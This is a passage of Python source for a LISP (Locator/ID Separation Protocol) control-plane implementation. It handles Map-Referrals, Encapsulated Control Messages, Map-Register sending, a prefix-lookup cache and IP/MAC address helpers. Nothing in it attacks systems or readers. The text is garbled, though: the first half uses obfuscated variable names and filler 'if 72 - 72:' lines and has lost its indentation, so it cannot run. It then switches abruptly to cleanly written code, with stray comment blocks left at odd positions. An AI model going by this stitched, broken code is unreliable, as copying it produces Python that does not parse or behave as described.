o0Oooo00oO0o00 = ooo000O0O . auth_key [ I1I1I1 ]
else :
o0Oooo00oO0o00 = ""
I1iiIIiIII1i = lisp_verify_auth ( packet , Ii1ii1 . alg_id ,
Ii1ii1 . auth_data , o0Oooo00oO0o00 )
I1I1I1 = "key-id {}" . format ( I1I1I1 ) if I1I1I1 == Ii1ii1 . key_id else "bad key-id {}" . format ( Ii1ii1 . key_id )
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if I1iiIIiIII1i else "failed" , I1I1I1 ) )
if ( I1iiIIiIII1i == False ) : return
if ( Ii1ii1 . retransmit_timer ) : Ii1ii1 . retransmit_timer . cancel ( )
I1i1i = source . print_address ( )
Oo000O000 = Ii1ii1 . nonce_key
if ( lisp_map_notify_queue . has_key ( Oo000O000 ) ) :
Ii1ii1 = lisp_map_notify_queue . pop ( Oo000O000 )
if ( Ii1ii1 . retransmit_timer ) : Ii1ii1 . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( Oo000O000 ) )
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( Ii1ii1 . nonce_key , red ( I1i1i , False ) ) )
return
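#
# Sketch of the retransmit bookkeeping the Ack path above relies on: a
# pending Map-Notify sits in lisp_map_notify_queue under its nonce key
# until the matching Ack cancels the timer and drops the entry (names
# hypothetical):
#
def _example_ack_pending_notify(queue, nonce_key):
    if nonce_key in queue:
        notify = queue.pop(nonce_key)
        if notify.retransmit_timer: notify.retransmit_timer.cancel()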
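#
# lisp_map_referral_loop
#
# Referral loop detection: returns True when a Node- or MS-Referral carries
# an EID-prefix that is not more-specific than the prefix cached from the
# previous referral, meaning the DDT walk is not converging.
#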
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
OOOoOoOO0oo = False
if ( group . is_null ( ) == False ) :
OOOoOoOO0oo = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if ( OOOoOoOO0oo == False ) :
OOOoOoOO0oo = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if ( OOOoOoOO0oo ) :
iIIiIIiII111 = lisp_print_eid_tuple ( eid , group )
I1II1 = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( iIIiIIiII111 , False ) , s ,
I1II1 ) )
return ( OOOoOoOO0oo )
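#
# lisp_process_map_referral
#
# Process a DDT Map-Referral: match it to a queued Map-Request by nonce,
# check for referral loops, update the referral-cache and per-node up/down
# state, then follow the referral, retry at the root, or answer the ITR
# with a negative Map-Reply depending on the action code.
#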
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
iiII1IiIi1i = lisp_map_referral ( )
packet = iiII1IiIi1i . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
iiII1IiIi1i . print_map_referral ( )
IiII1iiI = source . print_address ( )
Iii11I = iiII1IiIi1i . nonce
for IiIIi1IiiIiI in range ( iiII1IiIi1i . record_count ) :
i111iII = lisp_eid_record ( )
packet = i111iII . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
i111iII . print_record ( " " , True )
Oo000O000 = str ( Iii11I )
if ( Oo000O000 not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( Iii11I ) , IiII1iiI ) )
continue
I1I1iiii111II = lisp_ddt_map_requestQ [ Oo000O000 ]
if ( I1I1iiii111II == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( Iii11I ) , IiII1iiI ) )
continue
if ( lisp_map_referral_loop ( I1I1iiii111II , i111iII . eid , i111iII . group ,
i111iII . action , IiII1iiI ) ) :
I1I1iiii111II . dequeue_map_request ( )
continue
I1I1iiii111II . last_cached_prefix [ 0 ] = i111iII . eid
I1I1iiii111II . last_cached_prefix [ 1 ] = i111iII . group
iI1I11II = False
oo0oooo00OOO = lisp_referral_cache_lookup ( i111iII . eid , i111iII . group ,
True )
if ( oo0oooo00OOO == None ) :
iI1I11II = True
oo0oooo00OOO = lisp_referral ( )
oo0oooo00OOO . eid = i111iII . eid
oo0oooo00OOO . group = i111iII . group
if ( i111iII . ddt_incomplete == False ) : oo0oooo00OOO . add_cache ( )
elif ( oo0oooo00OOO . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( oo0oooo00OOO . print_eid_tuple ( ) , False ) ) )
I1I1iiii111II . dequeue_map_request ( )
continue
I11I1iI = i111iII . action
oo0oooo00OOO . referral_source = source
oo0oooo00OOO . referral_type = I11I1iI
oOoooOOO0o0 = i111iII . store_ttl ( )
oo0oooo00OOO . referral_ttl = oOoooOOO0o0
oo0oooo00OOO . expires = lisp_set_timestamp ( oOoooOOO0o0 )
oOo000oOoO = oo0oooo00OOO . is_referral_negative ( )
if ( oo0oooo00OOO . referral_set . has_key ( IiII1iiI ) ) :
iiI111I = oo0oooo00OOO . referral_set [ IiII1iiI ]
if ( iiI111I . updown == False and oOo000oOoO == False ) :
iiI111I . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( IiII1iiI ) )
elif ( iiI111I . updown == True and oOo000oOoO == True ) :
iiI111I . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( IiII1iiI ) )
oOo0OooOoooO = { }
for Oo000O000 in oo0oooo00OOO . referral_set : oOo0OooOoooO [ Oo000O000 ] = None
for IiIIi1IiiIiI in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
packet = I1Ii11iI . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
I1Ii11iI . print_record ( " " )
oo0o00OO = I1Ii11iI . rloc . print_address ( )
if ( oo0oooo00OOO . referral_set . has_key ( oo0o00OO ) == False ) :
iiI111I = lisp_referral_node ( )
iiI111I . referral_address . copy_address ( I1Ii11iI . rloc )
oo0oooo00OOO . referral_set [ oo0o00OO ] = iiI111I
if ( IiII1iiI == oo0o00OO and oOo000oOoO ) : iiI111I . updown = False
else :
iiI111I = oo0oooo00OOO . referral_set [ oo0o00OO ]
if ( oOo0OooOoooO . has_key ( oo0o00OO ) ) : oOo0OooOoooO . pop ( oo0o00OO )
iiI111I . priority = I1Ii11iI . priority
iiI111I . weight = I1Ii11iI . weight
for Oo000O000 in oOo0OooOoooO : oo0oooo00OOO . referral_set . pop ( Oo000O000 )
I11i11i1 = oo0oooo00OOO . print_eid_tuple ( )
if ( iI1I11II ) :
if ( i111iII . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( I11i11i1 , False ) ) )
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( I11i11i1 , False ) , i111iII . rloc_count ) )
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( I11i11i1 , False ) , i111iII . rloc_count ) )
if ( I11I1iI == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( I1I1iiii111II . lisp_sockets , oo0oooo00OOO . eid ,
oo0oooo00OOO . group , I1I1iiii111II . nonce , I1I1iiii111II . itr , I1I1iiii111II . sport , 15 , None , False )
I1I1iiii111II . dequeue_map_request ( )
if ( I11I1iI == LISP_DDT_ACTION_NOT_AUTH ) :
if ( I1I1iiii111II . tried_root ) :
lisp_send_negative_map_reply ( I1I1iiii111II . lisp_sockets , oo0oooo00OOO . eid ,
oo0oooo00OOO . group , I1I1iiii111II . nonce , I1I1iiii111II . itr , I1I1iiii111II . sport , 0 , None , False )
I1I1iiii111II . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( I1I1iiii111II , True )
if ( I11I1iI == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( oo0oooo00OOO . referral_set . has_key ( IiII1iiI ) ) :
iiI111I = oo0oooo00OOO . referral_set [ IiII1iiI ]
iiI111I . updown = False
if ( len ( oo0oooo00OOO . referral_set ) == 0 ) :
I1I1iiii111II . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( I1I1iiii111II , False )
if ( I11I1iI in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( I1I1iiii111II . eid . is_exact_match ( i111iII . eid ) ) :
if ( not I1I1iiii111II . tried_root ) :
lisp_send_ddt_map_request ( I1I1iiii111II , True )
else :
lisp_send_negative_map_reply ( I1I1iiii111II . lisp_sockets ,
oo0oooo00OOO . eid , oo0oooo00OOO . group , I1I1iiii111II . nonce , I1I1iiii111II . itr ,
I1I1iiii111II . sport , 15 , None , False )
I1I1iiii111II . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( I1I1iiii111II , False )
if ( I11I1iI == LISP_DDT_ACTION_MS_ACK ) : I1I1iiii111II . dequeue_map_request ( )
return
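#
# lisp_process_ecm
#
# Decode an Encapsulated-Control-Message. Only a Map-Request is accepted
# inside; it is handed to lisp_process_map_request() along with the inner
# source address and UDP port.
#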
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
I1iiiIII11ii1i1i1 = lisp_ecm ( 0 )
packet = I1iiiIII11ii1i1i1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
I1iiiIII11ii1i1i1 . print_ecm ( )
O0ooOoO0 = lisp_control_header ( )
if ( O0ooOoO0 . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
oO0ooooooOo = O0ooOoO0 . type
del ( O0ooOoO0 )
if ( oO0ooooooOo != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
I1iIi1I1I11iI = I1iiiIII11ii1i1i1 . udp_sport
oooooo0ooo0O = time . time ( )
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
I1iiiIII11ii1i1i1 . source , I1iIi1I1I11iI , I1iiiIII11ii1i1i1 . ddt , - 1 , oooooo0ooo0O )
return
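#
# lisp_send_map_register
#
# Compute the authentication data for a Map-Register, optionally ChaCha-
# encrypt the body with the map-server's configured key, and send it to the
# map-server. For a LISP-Decent multicast peer-group the first registration
# is bootstrapped through 127.0.0.1.
#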
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
oo0OoO = ms . map_server
if ( lisp_decent_push_configured and oo0OoO . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
oo0OoO = copy . deepcopy ( oo0OoO )
oo0OoO . address = 0x7f000001
I11i1iIiiIiIi = bold ( "Bootstrap" , False )
i11ii = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( I11i1iIiiIiIi , i11ii ) )
packet = lisp_compute_auth ( packet , map_register , ms . password )
if ( ms . ekey != None ) :
II11iI11i1 = ms . ekey . zfill ( 32 )
iiI1iiIiiiI1I = "0" * 8
o0 = chacha . ChaCha ( II11iI11i1 , iiI1iiIiiiI1I ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + o0
oOo = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( oOo , ms . ekey_id ) )
OOo00OO = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
OOo00OO = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
lprint ( "Send Map-Register to map-server {}{}{}" . format ( oo0OoO . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , OOo00OO ) )
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , packet )
return
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
i1IIi1ii1i1ii = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
packet = lisp_control_packet_ipc ( packet , i1IIi1ii1i1ii , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if ( lisp_nat_traversal ) :
oo0O = lisp_get_any_translated_port ( )
if ( oo0O != None ) : inner_sport = oo0O
I1iiiIII11ii1i1i1 = lisp_ecm ( inner_sport )
I1iiiIII11ii1i1i1 . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
I1iiiIII11ii1i1i1 . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
I1iiiIII11ii1i1i1 . ddt = ddt
ooo000 = I1iiiIII11ii1i1i1 . encode ( packet , inner_source , inner_dest )
if ( ooo000 == None ) :
lprint ( "Could not encode ECM message" )
return
I1iiiIII11ii1i1i1 . print_ecm ( )
packet = ooo000 + packet
oo0o00OO = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( oo0o00OO ) )
oo0OoO = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , packet )
return
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
def byte_swap_64 ( address ) :
    swapped = ( ( ( address & 0x00000000000000ff ) << 56 ) |
                ( ( address & 0x000000000000ff00 ) << 40 ) |
                ( ( address & 0x0000000000ff0000 ) << 24 ) |
                ( ( address & 0x00000000ff000000 ) << 8 ) |
                ( ( address & 0x000000ff00000000 ) >> 8 ) |
                ( ( address & 0x0000ff0000000000 ) >> 24 ) |
                ( ( address & 0x00ff000000000000 ) >> 40 ) |
                ( ( address & 0xff00000000000000 ) >> 56 ) )
    return ( swapped )
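#
# Quick illustrative check of the byte-order reversal:
#
#   byte_swap_64(0x0102030405060708) == 0x0807060504030201
#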
class lisp_cache_entries ( ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
class lisp_cache ( ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
def cache_size ( self ) :
return ( self . cache_count )
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
OOoOOO = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
OOoOOO = prefix . mask_len
else :
OOoOOO = prefix . mask_len + 48
o0OoO0000o = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
O0ooo0 = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
IiiI1iii1iIiiI = prefix . addr_length ( ) * 2
IiiIIi1 = lisp_hex_string ( prefix . address ) . zfill ( IiiI1iii1iIiiI )
else :
IiiIIi1 = prefix . address
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
O0ooo0 = "8003"
IiiIIi1 = prefix . address . print_geo ( )
else :
O0ooo0 = ""
IiiIIi1 = ""
Oo000O000 = o0OoO0000o + O0ooo0 + IiiIIi1
return ( [ OOoOOO , Oo000O000 ] )
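#
# Illustration of the lookup key build_key() returns: [mask-length bucket,
# instance-ID (8 hex digits) + AFI (4 hex digits) + address]. The bucket is
# offset by 48 for real AFIs, which appears to keep IID-range entries (whose
# buckets are their raw mask-lengths) sorted ahead of address prefixes. For
# example, 10.0.0.0/8 in instance-ID 0 would yield:
#
#   [8 + 48, "00000000" + "0001" + "0a000000"]
#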
if 72 - 72: OoooooooOO * II111iiii + OoO0O00 % iIii1I11I1II1 . I1ii11iIi11i % OoooooooOO
if 19 - 19: OoOoOO00 + I1Ii111
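
    #
    # Illustrative key layout (a sketch, not executed; lisp_address is
    # defined later in this file): an IPv4 EID-prefix 10.0.0.0/8 in
    # instance-ID 1000 maps to ml == 56 (8 + 48) with a key that
    # concatenates "000003e8" (instance-ID), "0001" (AFI), and the
    # zero-filled hex address, so keys sort by instance-ID, then AFI,
    # then address.
    #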

    def add_cache(self, prefix, entry):
        if (prefix.is_binary()): prefix.zero_host_bits()
        ml, key = self.build_key(prefix)
        if (ml not in self.cache):
            self.cache[ml] = lisp_cache_entries()
            self.cache[ml].entries = {}
            self.cache[ml].entries_sorted = []
            self.cache_sorted = sorted(self.cache)

        if (key not in self.cache[ml].entries):
            self.cache_count += 1

        self.cache[ml].entries[key] = entry
        self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)

    def lookup_cache(self, prefix, exact):
        ml, key = self.build_key(prefix)
        if (exact):
            if (ml not in self.cache): return(None)
            if (key not in self.cache[ml].entries): return(None)
            return(self.cache[ml].entries[key])

        #
        # Longest-match lookup. Walk mask lengths in ascending order and
        # remember the last (most specific) covering entry found.
        #
        found = None
        for mask_len in self.cache_sorted:
            if (ml < mask_len): return(found)
            for entry_key in self.cache[mask_len].entries_sorted:
                entries = self.cache[mask_len].entries
                if (entry_key in entries):
                    entry = entries[entry_key]
                    if (entry == None): continue
                    if (prefix.is_more_specific(entry.eid)): found = entry

        return(found)

    def delete_cache(self, prefix):
        ml, key = self.build_key(prefix)
        if (ml not in self.cache): return
        if (key not in self.cache[ml].entries): return
        self.cache[ml].entries.pop(key)
        self.cache[ml].entries_sorted.remove(key)
        self.cache_count -= 1

    def walk_cache(self, function, parms):
        for ml in self.cache_sorted:
            for key in self.cache[ml].entries_sorted:
                entry = self.cache[ml].entries[key]
                keep_going, parms = function(entry, parms)
                if (keep_going == False): return(parms)

        return(parms)

    def print_cache(self):
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint("  Cache is empty")
            return

        for ml in self.cache_sorted:
            for key in self.cache[ml].entries_sorted:
                entry = self.cache[ml].entries[key]
                lprint("  Mask-length: {}, key: {}, entry: {}".format(ml, key,
                    entry))
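
#
# Illustrative usage sketch for lisp_cache (not executed by the module;
# "entry" stands for a hypothetical map-cache entry whose .eid attribute
# equals the stored prefix):
#
#   cache = lisp_cache()
#   eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#   eid.store_prefix("[0]10.0.0.0/8")
#   cache.add_cache(eid, entry)
#   host = lisp_address(LISP_AFI_NONE, "", 0, 0)
#   host.store_prefix("[0]10.1.1.1/32")
#   hit = cache.lookup_cache(host, False)   # longest match returns entry
#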

lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache()

def lisp_map_cache_lookup(source, dest):

    multicast = dest.is_multicast_address()

    #
    # Look up destination (or group address) in the map-cache.
    #
    mc = lisp_map_cache.lookup_cache(dest, False)
    if (mc == None):
        eid_str = source.print_sg(dest) if multicast else dest.print_address()
        eid_str = green(eid_str, False)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    #
    # A unicast lookup is done at this point.
    #
    if (multicast == False):
        prefix_str = green(mc.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format(
            green(dest.print_address(), False), prefix_str))
        return(mc)

    #
    # For an (S,G) lookup, search the source in the group entry's
    # source-cache.
    #
    mc = mc.lookup_source_cache(source, False)
    if (mc == None):
        eid_str = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    prefix_str = green(mc.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format(
        green(source.print_sg(dest), False), prefix_str))
    return(mc)
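
#
# Note on the lookup flow above: unicast destinations take a single
# longest-match lookup; for (S,G) multicast the group entry found in
# lisp_map_cache holds a second-stage source-cache that is searched with
# lookup_source_cache() (defined elsewhere in this file).
#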

def lisp_referral_cache_lookup(eid, group, exact):
    if (group and group.is_null()):
        referral = lisp_referral_cache.lookup_cache(eid, exact)
        return(referral)

    #
    # No source supplied for an (S,G) lookup.
    #
    if (eid == None or eid.is_null()): return(None)

    #
    # For (S,G), look up the group first, then the source within the
    # group entry's source-cache.
    #
    referral = lisp_referral_cache.lookup_cache(group, exact)
    if (referral == None): return(None)

    source_referral = referral.lookup_source_cache(eid, exact)
    if (source_referral): return(source_referral)

    if (exact): referral = None
    return(referral)

def lisp_ddt_cache_lookup(eid, group, exact):
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, exact)
        return(ddt_entry)

    #
    # No source supplied for an (S,G) lookup.
    #
    if (eid.is_null()): return(None)

    #
    # For (S,G), look up the group first, then the source within the
    # group entry's source-cache.
    #
    ddt_entry = lisp_ddt_cache.lookup_cache(group, exact)
    if (ddt_entry == None): return(None)

    source_entry = ddt_entry.lookup_source_cache(eid, exact)
    if (source_entry): return(source_entry)

    if (exact): ddt_entry = None
    return(ddt_entry)

def lisp_site_eid_lookup(eid, group, exact):

    if (group.is_null()):
        site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
        return(site_eid)

    #
    # No source supplied for an (S,G) lookup.
    #
    if (eid.is_null()): return(None)

    #
    # For (S,G), look up the group first, then the source within the
    # group entry's source-cache.
    #
    site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
    if (site_eid == None): return(None)

    source_site_eid = site_eid.lookup_source_cache(eid, exact)
    if (source_site_eid): return(source_site_eid)

    if (exact):
        site_eid = None
    else:

        #
        # Longest match found a group entry but no source under it. If
        # the parent entry accepts more-specifics and covers the group,
        # return the parent.
        #
        parent = site_eid.parent_for_more_specifics
        if (parent and parent.accept_more_specifics):
            if (group.is_more_specific(parent.group)): site_eid = parent

    return(site_eid)

class lisp_address():
    def __init__(self, afi, addr_str, mask_len, iid):
        self.afi = afi
        self.mask_len = mask_len
        self.instance_id = iid
        self.iid_list = []
        self.address = 0
        if (addr_str != ""): self.store_address(addr_str)

    def copy_address(self, addr):
        if (addr == None): return
        self.afi = addr.afi
        self.address = addr.address
        self.mask_len = addr.mask_len
        self.instance_id = addr.instance_id
        self.iid_list = addr.iid_list

    def make_default_route(self, addr):
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        self.mask_len = 0
        self.address = 0

    def make_default_multicast_route(self, addr):
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        if (self.afi == LISP_AFI_IPV4):
            self.address = 0xe0000000
            self.mask_len = 4

        if (self.afi == LISP_AFI_IPV6):
            self.address = 0xff << 120
            self.mask_len = 8

        if (self.afi == LISP_AFI_MAC):
            self.address = 0xffffffffffff
            self.mask_len = 48

    def not_set(self):
        return(self.afi == LISP_AFI_NONE)

    def is_private_address(self):
        if (self.is_ipv4() == False): return(False)
        addr = self.address
        if (((addr & 0xff000000) >> 24) == 10): return(True)
        if (((addr & 0xff000000) >> 24) == 172):
            byte2 = (addr & 0x00ff0000) >> 16
            if (byte2 >= 16 and byte2 <= 31): return(True)

        if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
        return(False)

    def is_multicast_address(self):
        if (self.is_ipv4()): return(self.is_ipv4_multicast())
        if (self.is_ipv6()): return(self.is_ipv6_multicast())
        if (self.is_mac()): return(self.is_mac_multicast())
        return(False)

    def host_mask_len(self):
        if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
        if (self.afi == LISP_AFI_GEO_COORD):
            return(len(self.address.print_geo()) * 8)

        return(0)

    def is_iana_eid(self):
        if (self.is_ipv6() == False): return(False)
        addr = self.address >> 96
        return(addr == 0x20010005)

    def addr_length(self):
        if (self.afi == LISP_AFI_IPV4): return(4)
        if (self.afi == LISP_AFI_IPV6): return(16)
        if (self.afi == LISP_AFI_MAC): return(6)
        if (self.afi == LISP_AFI_E164): return(8)
        if (self.afi == LISP_AFI_LCAF): return(0)
        if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
        if (self.afi == LISP_AFI_IID_RANGE): return(4)
        if (self.afi == LISP_AFI_GEO_COORD):
            return(len(self.address.print_geo()))

        return(0)

    def afi_to_version(self):
        if (self.afi == LISP_AFI_IPV4): return(4)
        if (self.afi == LISP_AFI_IPV6): return(6)
        return(0)

    def packet_format(self):

        #
        # Return the struct format string used to pack/unpack this AFI's
        # address; byte-order conversion is done by the caller.
        #
        if (self.afi == LISP_AFI_IPV4): return("I")
        if (self.afi == LISP_AFI_IPV6): return("QQ")
        if (self.afi == LISP_AFI_MAC): return("HHH")
        if (self.afi == LISP_AFI_E164): return("II")
        if (self.afi == LISP_AFI_LCAF): return("I")
        return("")

    def pack_address(self):
        packet_format = self.packet_format()
        packet = ""
        if (self.is_ipv4()):
            packet = struct.pack(packet_format, socket.htonl(self.address))
        elif (self.is_ipv6()):
            addr1 = byte_swap_64(self.address >> 64)
            addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
            packet = struct.pack(packet_format, addr1, addr2)
        elif (self.is_mac()):
            addr = self.address
            addr1 = (addr >> 32) & 0xffff
            addr2 = (addr >> 16) & 0xffff
            addr3 = addr & 0xffff
            packet = struct.pack(packet_format, addr1, addr2, addr3)
        elif (self.is_e164()):
            addr = self.address
            addr1 = (addr >> 32) & 0xffffffff
            addr2 = (addr & 0xffffffff)
            packet = struct.pack(packet_format, addr1, addr2)
        elif (self.is_dist_name()):
            packet += self.address + "\0"

        return(packet)

    def unpack_address(self, packet):
        packet_format = self.packet_format()
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        addr = struct.unpack(packet_format, packet[:format_size])

        if (self.is_ipv4()):
            self.address = socket.ntohl(addr[0])

        elif (self.is_ipv6()):

            #
            # Special case the first 64-bit word: if it fits in 16 bits
            # with a zero low-order byte, shift it directly into the
            # high-order position; otherwise byte-swap it like the second
            # word.
            #
            if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
                upper = (addr[0] << 48) << 64
            else:
                upper = byte_swap_64(addr[0]) << 64

            lower = byte_swap_64(addr[1])
            self.address = upper | lower

        elif (self.is_mac()):
            short1 = addr[0]
            short2 = addr[1]
            short3 = addr[2]
            self.address = (short1 << 32) + (short2 << 16) + short3

        elif (self.is_e164()):
            self.address = (addr[0] << 32) + addr[1]

        elif (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            format_size = 0

        packet = packet[format_size::]
        return(packet)

    def is_ipv4(self):
        return(True if (self.afi == LISP_AFI_IPV4) else False)

    def is_ipv4_link_local(self):
        if (self.is_ipv4() == False): return(False)
        return(((self.address >> 16) & 0xffff) == 0xa9fe)

    def is_ipv4_loopback(self):
        if (self.is_ipv4() == False): return(False)
        return(self.address == 0x7f000001)

    def is_ipv4_multicast(self):
        if (self.is_ipv4() == False): return(False)
        return(((self.address >> 24) & 0xf0) == 0xe0)

    def is_ipv4_string(self, addr_str):
        return(addr_str.find(".") != -1)

    def is_ipv6(self):
        return(True if (self.afi == LISP_AFI_IPV6) else False)

    def is_ipv6_link_local(self):
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 112) & 0xffff) == 0xfe80)

    def is_ipv6_string_link_local(self, addr_str):
        return(addr_str.find("fe80::") != -1)

    def is_ipv6_loopback(self):
        if (self.is_ipv6() == False): return(False)
        return(self.address == 1)

    def is_ipv6_multicast(self):
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 120) & 0xff) == 0xff)

    def is_ipv6_string(self, addr_str):
        return(addr_str.find(":") != -1)

    def is_mac(self):
        return(True if (self.afi == LISP_AFI_MAC) else False)

    def is_mac_multicast(self):
        if (self.is_mac() == False): return(False)
        return((self.address & 0x010000000000) != 0)

    def is_mac_broadcast(self):
        if (self.is_mac() == False): return(False)
        return(self.address == 0xffffffffffff)

    def is_mac_string(self, addr_str):
        return(len(addr_str) == 15 and addr_str.find("-") != -1)

    def is_link_local_multicast(self):
